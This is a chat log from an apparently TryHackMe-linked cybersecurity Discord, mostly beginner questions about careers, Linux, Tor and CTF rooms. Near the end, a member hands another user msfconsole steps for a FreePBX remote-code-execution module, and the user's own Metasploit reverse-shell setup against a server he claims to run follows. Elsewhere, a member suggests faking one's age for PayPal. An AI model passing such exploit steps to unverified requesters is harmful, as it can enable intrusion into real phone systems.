#general
1 messages ยท Page 2318 of 1
wot for?

Barely visible

Mmm
Yum

has anyone ever used an IMSI catcher?
Could be illegal to use one depending on where you are
Gave +1 Rep to @grizzled anchor (current: #3672 - 1)
Is it also illegal to use it to track people's locations?
It depends.
generally yes
what vpn u are using right now?
Check your local laws. It's usually illegal uess you're law enforcement
this system has GOT to be built by a troll
Github innit
omggg i got one of the 10 wrong and now i have to do 10 more LMAOOO
Imagine grandma trying to log into a website and she has to understand this
Godspeed grandma
they wont. even tho thats absurd and nearly impossible to do correctly because the imgs render all broken
imma try to signup on my phone
Don't they have SSO with Microsoft accounts
if you use microsoft yes
rip its doing it to my phone too they prob flagged my ip. im absolutely not doing that puzzle rn
Good luck next time ig
lies and lies
And more lies
How do you guys use RFCs for learning about something? Do you guys read them cover to cover or only look into them if u can't find something elsewhere or just google and look other less complicated articles about the topic?
guys i have no background in cybersecurity i just signed up for thm where and what should i start with?
:hammer: eyesprep0720#0 has been banned.
what do i type here i said cybersecurity and it says its wrong
Read the text above
and then read the question
ok i did that and it worked
Ew
Security analyst
Be a man and do penetration testing
ok i guess
i am still new so i have no background on anything
you work with that?
I thougt you were still in school
i still i am
Not you, the Yon guy taking a piss on Soc analyst's
while not having a job, the irony
which is better cuz i am lost now what to learn first
or what to do
Fah nah
I'm 22
Fuck u mean bro I'm studying
I work as a software dev
Did you not write the other day you were studying from home
Ain't u got sum better to do than to be a prick?
Yeah... U can work from home too
It's a thing in these days
ok i will just learn pen testing sounds more fun tbh
you can do that in soc also, not a problem at all
Hehe
I was joking but sure
I think pentesting is the basis to know before being in SOC
so i leaen pen testing then SOC ?
You will learn it on the path to SOC also
should i leanr any coding languages too?
For you personally sure, coding needed for SOC you will learn anyways
queries, pulling data, building playbooks etc
I'd say the opposite tbh
That and you're more likely to get a SOC job than a Pentesting job
Pentesting is definitely sexier and is what people think of when you say you work in cybersecurity, but most businesses need defending
Pentests for Audits are nice but depending on where you are those will usually be annually and done by an external contractor
Thanks @stoic quarry
Gave +1 Rep to @stoic quarry (current: #99 - 110)
Pentesting looks sexy
A tiktok video of someone rooting a machine gets more views than someone going through pcaps to find which IP is conducting a port scan y'know

coz they want to ||hack their GF's Insta account||
It's commonly that aye

My government made a laws when ads have to skipable after 5 secs
Based
And yall are not
setting up depencencies for a build on win11 may be my 13th reason
windows can actually eat my shit.
im so done with it. microslop can go die
How are you installing it?
chocolatey and having to deal w cmake
im just over it. windows genuinely sucks. if i was using linux i would have been done 30 mins ago.
Do you build them often? If so just write a script to do it all so you can scale easier
i did exactly that it just wanted to break itself 15 times.
Lmao
MSVC just has a load of nonsense
Lmao
installed the 2022 community tools, watched the package break itself and im abt to take my windows m.2 and burn it in a fire
i will attempt to migrate to using that instead because yeah this is a massive headache like genuinely
Specifically anime girl desktops
Hate it lol
Who stares at their desktop all day
im doing all of this just to get a build going on a stupid ass software
"just install the dependencies"
install my foot into your rear
they did but because im modifiying the fork ill need to be able to build it myself
100% agreed there
would be wayyy better
This better save the day
It's MS
i have such a huge project ahead of me and im over here getting choked out by some dependencies
good point ๐ญ
mm rust
rust makes things sm easier. its efficient
my project will take months and thats if i can even properly pull it off, ill need collaborators over time
thank you its all a static html file LOL
not today LOL. skipping the framework stack to focus on actually building technical documents for this project
I need to go and place an order for a New raspberry pi 5 and another pico and a MCP4728 I2C DAC breakout board and a few other things
I have some question abt security enginner role who can help me
try to use torbrowser but make sure to stay secure
and u can also combinate with tails
Why do you need?
hiddenwikki
You arent going there just to take 2 screenshots and scare your friends
-# the fact that there isnt any website there
The darkweb isnt for curiosity. It is too dangerous
if u are gonna do that lemme know I wanna see them
Your information, everythings.
Wdym
Only enter the darkweb with a popurse
Yes.
It is very scary.
You shouldn't go in there.
Darkweb.
Even we are scare of the darkweb. The ethical hackers you know.
You shouldn't go there.
I bet it is not your real address dang
๐ค
Never. It is very scary.
It is the most deepest area in the internet. You shouldn't never go there.
Why
lmfao
For what
NO, never.
for fun
What fun
DONT EVER go there
There isnt much "fun" to be had lmao
Should I stick with windows 11 or try Ziron?
What's your use case?
Actually it isnt that scare bruh
Windows is fine
Gaming, and doing thm
Windows probably best
so Vms sometimes
I'd recommend having a Linux VM so you can learn tools properly
true specially with things like fornite
It is not that scare bruh, just get full opsec, dont click on random links, do not download anything, use vpn and tor and you r good
I'll just install it on my other pc that already has mint lol
dont worry im still at it trying to get this build to work
Use a VPN and tor
Bruh
Also, there isnt any "organs seller" or "red room" on there, they r all fake or creepy pasta
Fair enough
ahh yes the ppl that think using TOR with a VPN is a good idea
But u might find scary website that only used to scare you ahh
Btw, u might find some criminals markets in there, which sell drugs or exploits
Fair enough
Never use a VPN with tor at the same time.
Depends if you trust exit nodes
And if you found an exploit abt discord. Remind us :))
Why?
Some vpn providers won't let you anyway
Welp, also if you want more opsec. Use vm
Uh
A few major reasons. Tors design philosophy is built around eliminating the need for any single trusted entity. when you add a VPN you reintroduce that. and ontop of that your vpn provider sees you are connecting to tor and knows your real ip. you replaced your ISPs visibilty with the vpns and thats actually a worse trade most times since ISPs are regulated and vpns lie about logging. and if the VPN is subpoenaed or compromised your exposed. and ontop of that you gain almost nothing. theres really no good trade off for it and you increase your attack surface
No?
i keep trying to use Ctrl + alt + T on windows and im losing my mind
You can use a VM and have 10+ proxies, but if you post "Hey guys I live in X city" then you have shit OPSEC no matter how complicated you made your setup
I feel that
It drives me nuts im abt to make it a custom keybind
im so used to linux atp
ill end up using razer synapse in my case because it allows custom macro creation
but auto hotkey is a good choice still
Fair
esp for ppl without keyboard software
i love the linux community. razer decided to not make linux support so they went and reverse engineered synapse and made an open source fork of it and made the hardware detectable in custom applications easier
and its WAY better than razers dookie windows software
yes its actually awesome. its a lot faster than razers setup and they removed all the bloat and bs
I have Razer stuff but don't really care about making my keyboard go red yk
And KDE has easy keybinds
i completely understand that tbh, i use it because i have a 60% and need to add certain macros to spots for keys im missing or i use to to change my dpi
KDE is amazing for that
True. Mind sending me a link? I need to adjust the DPI lmao
my main distro i use is KDE and arch based
yes one sec
My mouse is either slow, fast, too fast, way too fast, or stupid fast
yay -S razergenie < this is the gui for the driver
or sudo apt install razergenie if debian
:hammer: tet_66#0 has been banned.
he got snipped rq
Thanks!
Gave +1 Rep to @mental spoke (current: #761 - 10)
+rep @cloud quiver
Gave +1 Rep to @cloud quiver (current: #1 - 6130)
make sure to add yourself to plugdev or things wont work sudo gpasswd -a $USER plugdev
if you have issues just ask claude to help you install it, super easy and takes like 5 commands max to get it all working
you can also just use polychromatic instead of razergenie
I'll probs just read docs but cheers
just easier for some ppl to do that then read docs, if youre comfortable with computers docs are no issue
I also just don't like LLMs lol
completely understandable
Watched someone use Claude to find the average of 7 numbers yesterday
some ppl rely on it WAY to much and are gonna become braindead
Truly a tool the likes of which haven't been seen before
also kde user here, it's fire
Yeah its nice
i use garuda linux and love it
Neat
@weak rampart sup ๐
I wanna mess with this flavor of garuda but havent yet
some ppl here would really dislike the flavor i daily tho LOL its really extra and colorful
Who gives a fuck
You like it
You use it
exactlyyyyyy
i enjoy it even tho its a bit heavy
This is cool too
i met so many people
Cool
met a dude from my country's national cyber team
its pretty fun. its a very clean distro theme wise and they did a great job
-# we do it daily
i don't
Oh
it's new to me
Right
yes
That's nice
I'm more of a weeb
So i like mine colourful

Gl
after 2 hours of fighting dependencies i got the build complete... that took WAY too long holy
Trash ๐๏ธ๐๏ธ๐๏ธ
share the wallpaper pls
Lol
I will when I get back
Dm me
So I'll remember
where did you get it from
just share to me
wallpaper
Idc
Snowie has fallen on the battlefield
RIP Snowie
@brisk tree Fucked off back home yet?
Fr
Ok, now go study
I'll send the wallpapers tonight
I will beat 0day
Lol, yesterday i pinged skidy and got a warning
What for?
Sounds dumb. ๐
What's that???
Was it automod?
Simply wanted his opinion
No someone did it
Interesting.
I see @lone thistle is back on the mod team.
Oh
Damn
Gotta keep a eye out
no I'm asking for real, what's this graphical thing called
gui?
Arch with hyprland
Cool
nevermind, i might use it when i eventually switch to arch though
Crazy setup btw.
my linux mint would never
People who use Arch aren't hackers.
They're too busy customising their GUI and telling people they use Arch, to actually do any hacking.
if i use it, it'd be so i master linux stuff, not for hacking
what do you use for hacking
Wdym?
...Jealous of what. exactly?
There's only one version. Kali.
Incorrect.
Wrong
Is it.
You have Purple Kali.
Bro
Exactly
๐ค๐ฒ
Tf
Security based
I just use too much remnux and commando so.
I guess
i was trying to ask, do you care if it comes pre installed with all the 50 tools or would you prefer it to come as minimal as possible (aka clean) and you install only what you need
Ohh i see
I install all toold.
Then my own, and other tools which doens't come in Kali.
It only came out, I dunno, 2 years ago? lol.
It's a Kali release with more blue tools than normal Kali.
It's perfect for bleu
I do everything on remnux, unless it's disk forensics or windows file analysis or crazy windows log analyss, zimmerman toolkit and stuff like autopsy helps out a lot here.
I hate windows log analysis but meh.
Will look into it, thank you.
Gave +1 Rep to @sick lance (current: #2 - 3970)
Something super basic
Ya it was Missing essential Stuff
Lmao
Is it better maintained/packed now?
For a second i thought that was attackbox
Don't know, don't use it
Seems so
I land back home in 9 hours...got two days to prep for a CTF first and then I'll see.
Hell yeah
Cool
In my balls....innit.
It may as well be, I have pretty much all of it on my Kali.
Kek
Rest well
Honestly fair. Niki Lauda used to say that he had a great ass, that's why he felt the car components and the way it drove.
lauda?
We should be having good balls to know what tools tingle em good or not innit.
Fr
Austrian F1 driver.
One of the best one
oh i thought in hindi it was.. uhh.. leabe it
Liked his movie
Good stuff, a good portrayal as well, he liked it.
u mean max verstappen?
starring brad
I'm a merc guy ey...
You too?
I'm also a huge Ferrari/Italy guy so Antonelli in Merc makes it even better for me. :)
Suzuki swift rise up
The depression.
๐ญ.
Oh damn.
Sounds strange, the 488 has a pretty reliable engine, shares it with other variants too.
Gearbox is good too.
What's it been in the workshop for all those times?
This is bullshit.
I will not take this disrespect. Fucking lambos.
He might've gotten a bad model? could just talk to Ferrari about it? Has he done that yet?
I feel so burn out
Weird. 488 doesn't have many reliability issues.
AMG GTs are super nice yeah.
Honestly I like the c8, looks nice!
Yuuurrrr.
They're not as expensive as the AMG GTs or 911s too.
But I still like me some Merc/Ferrari
True true. ๐
THE ESCALATION MODULES IS F*CLING TORTURE
๐
Nah, i just feel so burn out
Then don't do the module. ๐
Iran is trying against 15 others countries
Say hi to Slava and Kib for me
Will do!
Well, yeah
Hii vader hru?
Iโm good
I cannot sit here and read information anymore๐ญ Im need a CTF..I NEED A CTF HAHAHADKSKAJ
How's everyone today?
Nice to hear that
Just get more RAM and do vulnhub
Get some Menthyl isovalerate
A good CTF this weekend.
DiceCTF.
Have fun.
WHERE, WHERE, I NEED IT
Capture The Flag, CTF teams, CTF ratings, CTF archive, CTF writeups

No, say hi yourself.
hi scrubz
Hai
what's up on this fine thursday
What is that
A platform you can download VMS from, taken over by htb
Virtual machines that are ready to be deployed through something like Oracle Virtualbox and you are supposed to use your knowledge to get a flag/file/access or full control at the target machine
You'll find a few of the machines on them on there.
I already have a homelab?
Can i do it on my homelab?
By the way, do you think that people with little knowledge/experience are also okay to participate in any ctf's?
Of course
Yes, if they can find the flags
I haven't really done anything on vulnhub but you should be able to, there are guides
Yes.
You'll learn stuff regardless of how you do.
If they can they can
I guess this is like that time where I had to recover a windows password on an unencrypted laptop
Never had done it before, but once I sat I did it
for the first time ever with chatgpt lol
Hiren'S boot
If you're like me, you'll learn more about yourself failing, than you will being successful.
I believe failure is a success in itself
If we didn't fail we wouldn't be able to succeed
It certainly is.
That's how you learn, trial and error
Lately I feel very tired of theory to be fair
Go slightly deeper than what you know and you'll learn faster than sticking in the stuff you're comfortable with
Lmao
Finally...
PT1 next.
me poor, my parents wont allow
Time to wash cars until you get money ig
i have money, enough, only thing that is my parents wont allow me to buy such as a thing
hello ppl
alr
good job 
What is wrong?
How to perform a reverse shell
Tell me

No using online sources, be true to yourself
Uhm uhmmm, first uhmm get the- the payload? Oh nah get the shell on - on target with privilege user and then then execute the payloads. And use a uhm and uhm wait no uhmmm
Jk
Nooooo
What is this?
A gif
caseoh mentioned
Bro is gatekeeping in the TryHackMe discord
What is that
@manic oyster eliminate the competition early
Okay
you don't know him?
He is not anything to me๐
Nope
I'd be more worried about DrOPSEC
I ddosed 67 people, google, cloudflare, etc๐
At what point do you consider this harassment?
dude I'm joking
I have his ip๐ im the final boss hecker
i mean I don't know
Bro pinged him like 6767 times
lowkey yeah
if he was actually active and not just troll alt account he'd just block me lowkey
Because that would make it better...
yeah
bro you can't say his account is made seriously
that's obviously a joke account
Doesn't mean they deserve to be pinged 2-4 times a day. ๐
i like pinging him, he's funny
Should i make an account for you to ping?
no
Ok
i want iphacker specifically
You'd be surprised what watching 1 episode of Mr. Robot will do to you
no
i don't bully people
Then you gonna go learn how to hack and give up cuz it is too hard or go with skid way (99,98%)
I don't understand half of that
Now im a hecker๐

Get a train on your CLI.
๐
Bruh, idk if parrot repo have it
did someone manage to do the takeover box lately?
https://tryhackme.com/room/takeover
โฏ ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt \
-H "Host: FUZZ.futurevera.thm" \
-u https://futurevera.thm \
-k -fw 1511 -fs 4605 \
-o takeover.json -of json
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://futurevera.thm
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.futurevera.thm
:: Output file : takeover.json
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 4605
:: Filter : Response words: 1511
________________________________________________
:: Progress: [100000/100000] :: Job [1/1] :: 578 req/sec :: Duration: [0:03:00] :: Errors: 0 ::
like tf?
u need wallpapers?
We got tryhackme HS2 before we got HS2 ๐ฎโ๐จ
Kek
Why are you looking for a json file?
its not looking its output
Tried a different directory list?
sl but more colors
nice
lolcat makes everything rainbow.
tried like 5 different ones
even rockyou at some point
I KNOW AND I STILL TRIED IT
One moment.
Are you saying there's nothing found inside the json output?
there's output but no hits
it wouldve shown on the term too
is there a dns server for the box that you query?
ohhhh
nothing was mentioned in the description of the box...
I did add the IP to the hosts file
there's this in one of the writeups.
I dont understand how he came into that conclusion
I'd personally try the Discovery/DNS/namelist.txt wordlist, maybe sublist3r, dnsrecon or just a simple dig
I believe you have to manually enumerate instead of using ffuf or other tools

bro what the fuck
And I literally just done that there.
that's fucking cap bro
what????
why did it work for u and not me?
Add in -u https://10.10.125.247
Yeah I wonder if it's struggling with resolving the IP from hosts maybe
ffuf -u https://10.10.125.247 -fs 0,4605 -H "Host: FUZZ.futurevera.thm" -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
@ocean wasp May I help you?
I assume it's because it's sending the requests from the host you define rather than the fuzzed host (in terms of headers)?
does it work if you change it from IP to hostname?
running it now
runs slow but i will let you know
Nah.
yeah I'm guessing it's a header thing maybe?
oh my mistake I copied your command and forgot about the IP
yeah I got 2 bingos, blog and support
ffuf doesnโt set headers automatically, this has bitten me in the past
it is an issue with resolving the url
Yeah, it's using the IP as the main lookup, and futurevera as the header.
Equivalent to house and mailbox
why does it work like that?
can u explain im geniouly curious
how do u spell that work?
-H is for header
Yeah that was my guess was that it was sending direct to the "mailbox"
like the header for the request?
so why did enum on the url didnt work but the IP did?
I just across something that personally I think is insane. I was trying to find an old friend of mine. All I did was give google ai a couple pieces of information and it gave me her whole back story and what area sheโs from. Obviously I know where sheโs from but ๐ I dunno. It rubs me the wrong way.
You're using the IP to look up the website, but using the host to specify.
Sometimes there will be multiple sub domains, urls at the same ip
nah I figured that out
but why
I hit some weird wildcard when I was running domain with the host header, like I got returned 200 for every single entry
Server may be configured to catch all urls (with a wild card) and redirect to a single pattern?
possible
but every single one?
idk seemed abit off
never encountered it before
Creator might have wanted to make the fuzzing a bit more of a challenge
People might do it to avoid broken links, for weird search engine optimization purposes
good point
lucky for you, you get to practice your filtering
guys my school asked to make a cv because we have smth called work experience and i put my skills dose it look alr ? pls dont flame me
it looks good in my opinion ๐
Have you actually done red teaming?
i meant to put offensive security mb
offensive security ( then give details )
thx
Gave +1 Rep to @pure steeple (current: #136 - 77)
What are you referencing with "permission-based"?
Perhaps he didn't want to sound like a black hat
that i dont do illeagal shit
You probably don't need to state this on a resume, it's implied
oh alr thx
Better to give examples of which offensive security areas you have skills in
Whether it is web, active directory, network/MITM, wireless, malware etc etc.
"Can you hack this account for me?"
"sorry, i only master osint"
thanks for the help
Gave +1 Rep to @pure steeple (current: #134 - 78)
There was a guy tell me to hack something in tiktok
Guys I have a question that I hope you could help me with, I was wondering with what language should I start with? Python 3 or C++? Thanks!
Python
Ofc
nah, C
python its fun and useful
It is the easiest language and the most common know to beginner
go do CS50
hmm
u mean the harvard cert ryt ?
He isnt learning rev๐ญ
I'm pretty much a beginner after all
it is a free online Harvard class, intro to CS, yes
Go python
yh i did that
CS50 teaches C to start and moves into Python
bro C takes time i lost so much of hair learning that and i still cant program it properly
Okayy
hair losing == learning
its free and useful for the basic understanding
compsci is the foundation of compsec
what's the difference between a degree in computer science and some tinkerer/bounty hunter? ๐ค
yh not good to lose at 14 yrs dawg
finna go bald by 18
Malware analyse
I think many computer science students end up like that ;-;
AI already took your job, enjoy your retirement at 18
not cybersed
Bounty hunter is just for more trusty. Cs is for more chance to get hire
Welp
I have a question, does AI also take over with cyber security?
Oh okay, thx!
Gave +1 Rep to @stuck ridge (current: #500 - 16)
no
?
we're in TryHackMe, house of the AI, you must say yes
You can go bug bounty if you have enough knowledge to find a bug and the company will pay for you if the bug is valid.
i wnna get paypal acc setup but my parents aint letting
Ooo okay
-# fake your age...
I like C to start because it is lower level and gives students practice with concepts like memory, pointers, a compiler etc. You need to understand how computers work to break them. I'm not saying you need to know C in detail or spend more than 2-3 weeks. You can move to a higher level language like Python. But they designed the learning path in CS50 intentionally, and it is very successful.
-# and enter your id number as 1234567890
-# dont tell anyone this
is it hard to be a bug bounty? I mean is it necessary to have a degree or is it sheer practice? I was thinking about doing so
yes
continues to say it in a public group
barf
Every jobs in this field is hard, you have to accept the fact that finding jobs and get pay in this field is very hard
are you speaking from experience?
Everyone wants to make money and survive. There are x jobs and y applicants. You will need to be better than 50% of the other applicants, at least. So start skilling up.
oki, I will still have in mind your advice :))
A wise teenager advice
this is an oxymoron
Is that nmap?
keep learning like me devlop skills then later when ur applying for a job it will be easy
No, it is my ultra sigma hyper threading ddos 5000 attacker
-# jk it is nmap
hey is it normal that in this room
https://tryhackme.com/room/winadbasics
There's ALWAYS someone logged on Sophie's Desktop and I cant get Flag from it? its task 4 and I've been waiting for like an hour now
ima put this in ma tt story
Im planing to go to blue team when im apply for a job
spends $5000, gets code that is just nmap in a while loop ... typical hacking transaction
wut that mean?
do hackers use gaming laptop? ๐ค Always wondered that
I can hack in a mobile phone if it have kali or parrot installed
pretty sure they use whatever they can get their hands on
Or a fridge
i love the music in this whats the name
thinkpad
What matters most is skill not the laptop
I believe you need root for doing so right?
Dancing nihist (idk if it is right)
Okayy!!
Yes, for kali, parrot doesnt have a img for mobile yet
But honestly a real hacker could still hack you with a potato laptop if they have the skills
I can hack from the smart frigde if they have kali installed and internet connection
Or smart toaster
is you're a tinkerer is it necessary doing root or with doing proot is just enough?
nah, can't hack me, I run bsd v1.0, patched
What is it?
what?
A tinker is
a person who makes minor, often experimental repairs on mechanical or household items, or an archaic term for an itinerant mender of pots and pans. As a verb, to tinker means to fix, adjust, or experiment with something in a casual, aimless, or sometimes unskillful manner.
hacked from a toaster would be a legendary story
@cosmic pendant You're apparently Legendary.

I've hacked coffee pot before
:0
I think if u can u should root (only if the phone you rooted isnt important)
do it now b/c I need it to give me more coffee
@bold rover how dose it look so far ?
Okayy!!
Also one question
why is Kali so important for you when talking about hacking?
๐ค
It is a toolbox
it's just convenient, it has lots of tools pre-installed
And it is designed to hack
now it brews root access instead of coffee
Only...to hack
no sudo apt install needed?
You cannot use it for daily use, its repo only have tools
Oo
i thought of adding sound effects to the typing
You can pull packages from other repos
No no no, NO. You're banned from Coffee, mr "I put it in the microwave" ass
Oh
If it were real it would basically be IoT security testing
ah alr
It was really cool, it was at a national lab, you had to hack the coffee pot each morning to get it started
can I hack a lightbulb like in watchdog2? ๐ค
But i remember that their devs even dont recommended to use kali as a daily os
If it is a smart one
currently outa 10 how much would you give it
You can exploit its firmware and get in
who is "devs"
Looking good

Okay!
developers
Just do what you want to do, there are very few absolutes
Hii
Yea
Cool that sounds like the most hacker workplace ever
Then raise the voltage to maximum and kabum it
Imagine coming to work and instead of a keycard you run a quick exploit
Woah
what does it mean when something is open source?
No hack becomes no coffee.
The source is open to public, you can access it
Anyone can access it
Also, the public community maintains it and makes updates to it
A closed source mean you only have the .exe or binary files, you cannot access the source
Ooo, okay thanks!
Gave +1 Rep to @stuck ridge (current: #483 - 17)
Let me check
just a blog
im still making it
Real hackers dont start their day with coffee they start with an SSH session to the coffee machine 
why do many people here use linux rather than maybe windows or macOS?
caffein for the machine type shi
Because linux is our heart
sup
Open source + there are many distros
Linux is free and open source
my IT teacher was flaming linux yesterday
Ooo
pls rate my website: https://www.webdesignmuseum.org/uploaded/fullscreen/slashs-snakepit-1995.png
does that also make Linux better for daily use?
If you want minimalist, arch. If you want daily use, ubuntu. If you want hacking, kali, parrot, etc
Im having a hard time trying to run a module in metasploit. Can someone help me? can pay 5$usd lol

Yes, there are many distros for that like ubuntu
your IT teacher is silly
The support was free and you tell us that you will pay???
i got sent out of the class for arguing with her
since I'm a noob, I was considering using Debian or mint
depends on why you're running it
Debian is for server?
Debian is just debian
Ill rate it like a 1995 website
what does that mean?
8/10
Rate mine as well, please:
https://admin.tryhackme.com/my-new-website
10/10
ahh
You r not getting me, i always use it
i hope u have a warm pilloe tonight and ur toes dont fit in ur blanket
Thanks, you guys are kind
how do y'all not get hacked? ๐ค What methods may I ask you guys might use?
Nice one
pro tip: never trust links from anyone above 0xD rank
I want to execute it against local server
Opsec, do not press on random links, never trust anything. Use zero-trust as a philosophy to you.
ok, what's your local server running, and why?
I have an answer for that in my website
https://admin.tryhackme.com/how-to-protect-yourself?id=1
And also, make your password as long as u can remember it
Rotate passwords often
Quit League of Legends
freepbx, I want to check if my server has been patched since updated.
woahuh just told me to not click on random links ๐ค
Okayyy!! Thx
Gave +1 Rep to @stuck ridge (current: #463 - 18)
in fact, just quit the internet and go start a small farm
Hiiii
I am just helping you and making your life easier
dont i fell for it again
How's it going!!
Yes, my boy, zero trust.
okay appreciate it
im gonna be under ur bed tonight
Yea it is
heh, I knew it!!
ok then try something like
msfconsole
use exploit/unix/http/freepbx_unauth_sqli_to_rce
set RHOSTS [Target-IP]
set LHOST [Your-IP]
set LPORT 4444
exploit
Lmao.
Funny, I work in SOCC..... No use if you're under my bed
Good, wbu
Any request go to that subdomain of thm will get redirect to a 4k, clear version of rickroll
I'm doing fine! Just learning over here ๐
gtg bye guys
Im trying with unix/http/freepbx_firmware_file_upload, I set rhost, rport, lhost, lport and run it but get this error:
[] Exploiting target 10.0.0.18
[] Started reverse TCP handler on 10.0.0.18:4444
[*] Trying to bypass authentication...
[-] Exploit aborted due to failure: unexpected-reply: Received unexpected reply
Bye
Are you having the right port for your server? Is your server actually open to this path of attack? Can you do things manually with curl? Really not enough info to know whats going wrong without more logging, some packets to inspect, or source code for your server.
and make sure RHOST and LHOST are different ... right now from your output they look the same?
guys what was nmap for? How may I use it? I just wanna explore my own router
Nmap ("Network Mapper") is a free, open-source tool used for network discovery, security auditing, and inventory management. It scans networks to identify active hosts, open ports, available services (application name/version), and operating systems. Cybersecurity professionals use it to detect vulnerabilities and monitor network uptime.
Yes, I set my server port to 443 and set RHOST to 443. RHOST and LHOST are different.
You're saying HOST stuff but giving PORT numbers. Does not compute.
what's that?
Okay, let me explain better. I set up my localhost + port like this:
msf > use /exploit/multi/handler
[] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.0.0.18
LHOST => 10.0.0.18
msf exploit(multi/handler) > set LPORT 444
LPORT => 444
msf exploit(multi/handler) > exploit
[] Started reverse TCP handler on 10.0.0.18:444
And rhost is running on port 443 example ip:443
Okay
Err....what?
RHOST is missing
Does anyone know why is nmap not working here? I must be horrible doing this ๐ข
wat?
๐ญ
just do nmap 192.168.0.1 to start
Okay I will try that!
first check whether target is in network or not use ping first...
Im setting rhost correctly.
msf exploit(unix/http/freepbx_firmware_file_upload) > set LHOST 10.0.0.18
LHOST => 10.0.0.18
msf exploit(unix/http/freepbx_firmware_file_upload) > set LPORT 444
LPORT => 444
msf exploit(unix/http/freepbx_firmware_file_upload) > set USERNAME admin
USERNAME => admin
msf exploit(unix/http/freepbx_firmware_file_upload) > set RPORT 443
RPORT => 443
msf exploit(unix/http/freepbx_firmware_file_upload) > set RHOST 10.0.0.11
RHOTS => 10.0.0.11
msf exploit(unix/http/freepbx_firmware_file_upload) > run
RHOTS => 10.0.0.11 Metasploit didn't make this typo
So you're not copy/pasting actual output?
also what should I do if it says "permission denied"? ๐ค
Then idk, you need to root for permisson
Im replacing rhost since I don't know if I'm able to poste ips here
Okay
And you def dont want to do that on your phone
Ye
he said it's his home lab, but I have my doubts
I run a freepbx server a security company that have a small call center for cs.
Did one day of THM. Time to commit crimes - That guy ig
I really appreciate help but if you guys cant help me for legal or ethical things I understand.
Can try https://tryhackme.com/module/metasploit and go from there, not enough info to help debug ๐
"Oh, metasploit contains all the exploit???"
You shouldn't take legal advice from strangers on discord
Im not taking anything, just asking for help cause dont know why I can run test
Thats all
Ty anyways
A classic
What is evilgnix??
I don't get it ๐ข
yes
dude you are crazy
why? What's wrong?
nothing . its to hard for me
you have to root the phone first of all
Proot is not enough?
i swear it worked before
nope
root phone ? i think use vps
he is using termux
Learn hacking (ad): https://www.hextree.io
What does it take to fix a vulnerability in Firefox and release an Update?
part 1: https://www.youtube.com/watch?v=YQEq5s4SRxY
part 2: https://www.youtube.com/watch?v=uXW_1hepfT4
part 3: https://www.youtube.com/watch?v=NT1VCmJF3mU
part 4: https://www.youtube.com/watch?v=x4CUAuwoZVk
(Spoilers) Firefox...
peak cinema
just ignore that warning. It says that , the Distro u trying to use mostly works with x64 structured processors but phones don't use those kind of processor so this warning occurs. Just ignore

